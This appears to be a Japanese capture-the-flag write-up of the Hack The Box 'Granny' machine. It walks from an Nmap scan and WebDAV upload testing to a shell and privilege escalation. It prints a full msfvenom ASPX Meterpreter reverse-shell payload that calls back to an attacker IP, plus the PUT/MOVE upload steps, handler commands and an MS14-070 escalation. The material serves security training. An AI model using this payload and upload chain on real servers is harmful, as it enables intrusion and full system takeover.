Table of Contents
Enumeration: Portscan by Nmap
Nmapでターゲット「10.10.10.15」に対してポートスキャンを実施。
※Nmapについて詳しく知りたい方は、以下のリンクをご参照ください。
Nmap
Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing.
Network Scanning using NMAP (Beginner Guide)
Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw I…
nmap -sC -sV -oA granny 10.10.10.15
-sC: default script scan
-sV: service version detection against open ports
-oA: Output in the three major formats at onceroot@kali:~/Desktop/htb/granny# nmap -sV -sC -oA granny 10.10.10.15 Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-26 02:42 EDT Nmap scan report for 10.10.10.15 Host is up (0.27s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0 | http-methods: |_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT | http-ntlm-info: | Target_Name: GRANNY | NetBIOS_Domain_Name: GRANNY | NetBIOS_Computer_Name: GRANNY | DNS_Domain_Name: granny | DNS_Computer_Name: granny |_ Product_Version: 5.2.3790 |_http-server-header: Microsoft-IIS/6.0 |_http-title: Under Construction | http-webdav-scan: | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH | WebDAV type: Unkown | Server Type: Microsoft-IIS/6.0 | Server Date: Sun, 26 Apr 2020 06:46:06 GMT |_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
以下のポートでWebサービスが動作していることを確認。
80/tcp (WEB):
– Version: Microsoft IIS httpd 6.0
– Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
– http-webdav-scanよりWebDAVが有効となっている。
以下のサイトより、Microsoft IIS 6.0はWindows Server 2003に導入されている。
Enumeration: 80/tcp (WEB)
WevDAV経由でアップロードもしくは実行可能なファイル拡張子に関する調査のためDAVTestでスキャンを実施。
※DAVTestについて詳しく知りたい方は、以下のリンクをご参照ください。
DAVTest
DAVTest tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine if enabled DAV services are exploitable.
davtest -url http://10.10.10.15
-url: url of DAV locationroot@kali:~/Desktop/htb/granny# davtest -url http://10.10.10.15 ******************************************************** Testing DAV connection OPEN SUCCEED: http://10.10.10.15 ******************************************************** NOTE Random string for this session: Fj4ZmfXGOq9 ******************************************************** Creating directory MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_Fj4ZmfXGOq9 ******************************************************** Sending test files PUT aspx FAIL PUT cgi FAIL PUT php SUCCEED: http://10.10.10.15/DavTestDir_Fj4ZmfXGOq9/davtest_Fj4ZmfXGOq9.php PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_Fj4ZmfXGOq9/davtest_Fj4ZmfXGOq9.jsp PUT shtml FAIL PUT asp FAIL PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_Fj4ZmfXGOq9/davtest_Fj4ZmfXGOq9.cfm PUT html SUCCEED: http://10.10.10.15/DavTestDir_Fj4ZmfXGOq9/davtest_Fj4ZmfXGOq9.html PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_Fj4ZmfXGOq9/davtest_Fj4ZmfXGOq9.jhtml PUT txt SUCCEED: http://10.10.10.15/DavTestDir_Fj4ZmfXGOq9/davtest_Fj4ZmfXGOq9.txt PUT pl SUCCEED: http://10.10.10.15/DavTestDir_Fj4ZmfXGOq9/davtest_Fj4ZmfXGOq9.pl ******************************************************** Checking for test file execution EXEC php FAIL EXEC jsp FAIL EXEC cfm FAIL EXEC html SUCCEED: http://10.10.10.15/DavTestDir_Fj4ZmfXGOq9/davtest_Fj4ZmfXGOq9.html EXEC jhtml FAIL EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_Fj4ZmfXGOq9/davtest_Fj4ZmfXGOq9.txt EXEC pl FAIL ********************************************************
DAVTestでアップロードされた以下の.htmlファイル「http://10.10.10.15/DavTestDir_Fj4ZmfXGOq9/davtest_Fj4ZmfXGOq9.html」のように、htmlファイルはアップロードかつ実行可能とのことなので試してみる。
まず、DAVTestのHTTP RequestをBurp SuiteでInterceptするため、以下の設定を行う。
Proxy > Options > Proxy Listenersの設定でAddを押下し、BindingタブでBurp Suiteが待ち受けるIPを設定する。
– Bind to port -> 8081
次にRequest handlingタブでIntercept後にForwardする宛先host/portを設定する。
– Redirect to host -> 10.10.10.15
– Redirect to host -> 80
Burp SuiteのInterceptの準備が完了したら、http://localhost:8081に対してDAVTestスキャンを実行する。
davtest -url http://localhost:8081Proxy > Intercept上のAction > Send to Repeaterより、InterceptしたDAVTestのHTTP RequestをRepeaterに送る。
Proxy > Interceptにて、以下の通りにHTTP Requestの内容を書き換えた上でGoをクリック。
– HTTP Request Method -> PUT
– HTTP Request Path -> /test.html
– HTTP Request Body -> This is a test.
→ステータスコード(201 Created)となり、test.htmlを問題なくアップロード出来た。
また、レスポンスヘッダー「X-Powered-By: ASP.NET」から、拡張子「.aspx」のファイルアップロードを受け付けていることが分かる。
<参考> ASP(.asp)とASPX(.aspx)の違い
– 拡張子の違い:ASPは『.asp』となり、ASP.NETは『.aspx』となる。拡張子が違うことによってエンジンが変わり、共存が可能である。
– 言語の違い:ASPでは使用されていたインタプリタ言語としてのVBScriptやJscriptが廃止され、ASP.NETではコンパイル言語としての、VB.NETやC#が使われるようになった。コンパイル言語を使用した結果としてパフォーマンスが数倍向上したと言える。
http://naoki0311.hateblo.jp/entry/20050606/1118036520
Reverse Shell via File Upload
msfvenomでASPX形式のReverse Shell(Meterpreter)のペイロードを作成する。
※msfvenomについて詳しく知りたい方は、以下のリンクをご参照ください。
Metasploit Framework
Metasploit is a penetration testing platform that enables you to find, exploit, and validate vulnerabilities.
Msfvenom Tutorials for Beginners
Hello friends!! Today we will learn to create payloads from a popular tool known as Metasploit, we will explore various option available within the tool to create payloads with different extensions and techniques. Msfvenom Msfvenom is a command line instance of Metasploit that is used to generate an…
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.5 lport=4444 -f aspx
-p: payload to use
-f: file extension
root@kali:~/Desktop/htb/granny# msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.5 lport=4444 -f aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2816 bytes
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
private static Int32 MEM_COMMIT=0x1000;
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
protected void Page_Load(object sender, EventArgs e)
{
byte[] g0rxt7qCB = new byte[341] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,
0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,
0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,
0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,
0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,
0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,
0x68,0x0a,0x0a,0x0e,0x05,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,
0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,
0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,
0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,
0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,
0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,
0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 };
IntPtr aD48XRx = VirtualAlloc(IntPtr.Zero,(UIntPtr)g0rxt7qCB.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
System.Runtime.InteropServices.Marshal.Copy(g0rxt7qCB,0,aD48XRx,g0rxt7qCB.Length);
IntPtr bOJhJu = IntPtr.Zero;
IntPtr zEDl2iv9a0 = CreateThread(IntPtr.Zero,UIntPtr.Zero,aD48XRx,IntPtr.Zero,0,ref bOJhJu);
}
</script>
Proxy > Interceptにて、msfvenomで作成したASPX形式のReverse Shellのペイロードを以下のHTTP PUT Requestのボディーに貼り付けてGoをクリック。
– HTTP Request Method -> PUT
– HTTP Request Path -> /shell.html
– HTTP Request Body -> ASPX形式のReverse Shellのペイロード
→ステータスコード(201 Created)となり、shell.htmlを問題なくアップロード出来た。
ブラウザからhttp://10.10.10.15/shell.htmlにアクセスして、アップロード済みファイル「shell.html」を確認可能。
当該ページ「shell.html」のソースを見ると、ASPX形式のReverse Shellのペイロードが確認できる。
次に以下のサイトを参考に、HTTP MOVE Requestを利用してアップロード済みのshell.htmlのファイル名をターゲット上で実行可能なASPX形式ファイル「/reverse-shell.aspx」に書き換える。
– HTTP Request Method -> MOVE
– Destination -> /reverse-shell.aspx
– Depth -> 削除
ステータスコード(201 Created)となり、shell.htmlからreverse-shell.aspxへのファイル名の書き換えが成功した。
Reverse Shell(Meterpreter)を受け付けるMSFのHandler「exploit/multi/handler」を攻撃端末上で起動する。
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 10.10.14.5 msf exploit(handler) > set lport 4444 msf exploit(handler) > exploit
ブラウザからhttp://reverse-shell.aspxにアクセスすることで、ASPX形式のReverse Shellのペイロードを実行させる。
サービスアカウント「NT AUTHORITY\NETWORK SERVICE」で動作するシェル奪取に成功。
meterpreter > getuid Server username: NT AUTHORITY\NETWORK SERVICE
sysinfo/systeminfoより、以下のシステム情報を確認。
– OS: Microsoft(R) Windows(R) Server 2003, Standard
– Architecutre: x86
– Original Install Date: 4/12/2017, 5:07:40 PM
meterpreter > sysinfo
Computer : GRANNY
OS : Windows .NET Server (Build 3790, Service Pack 2).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > shell
Process 4048 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: GRANNY
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 2 Hours, 33 Minutes, 12 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~1998 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 776 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,312 MB
Page File: In Use: 158 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A
meterpreter上でbackgroundを実行してmsfに戻る。
meterpreter > background [*] Backgrounding session 3...
Privilege Escalation (Windows)
ターゲットに存在する権限昇格の脆弱性を探すために、MSFのModule「post/multi/recon/local_exploit_suggester」を利用する。
msf exploit(multi/handler) > use post/multi/recon/local_exploit_suggester msf post(multi/recon/local_exploit_suggester) > set session 3 session => 2 msf post(multi/recon/local_exploit_suggester) > run [*] 10.10.10.15 - Collecting local exploits for x86/windows... [*] 10.10.10.15 - 39 exploit checks are being tried... [+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Post module execution completed
ここでは、上記の結果で表示されたMSFのExploit Module「exploit/windows/local/ms14_070_tcpip_ioctl」を使って権限昇格を図る。
MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference
Rapid7′s VulnDB is curated repository of vetted computer software exploits and exploitable vulnerabilities.
msf post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_070_tcpip_ioctl msf exploit(windows/local/ms14_070_tcpip_ioctl) > set session 3 session => 2 msf exploit(windows/local/ms14_070_tcpip_ioctl) > run
システムアカウント「NT AUTHORITY\SYSTEM」で動作するシェル奪取に成功。
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
Link
- HackTheBox – Granny by IppSec
https://www.youtube.com/watch?v=ZfPVGJGkORQ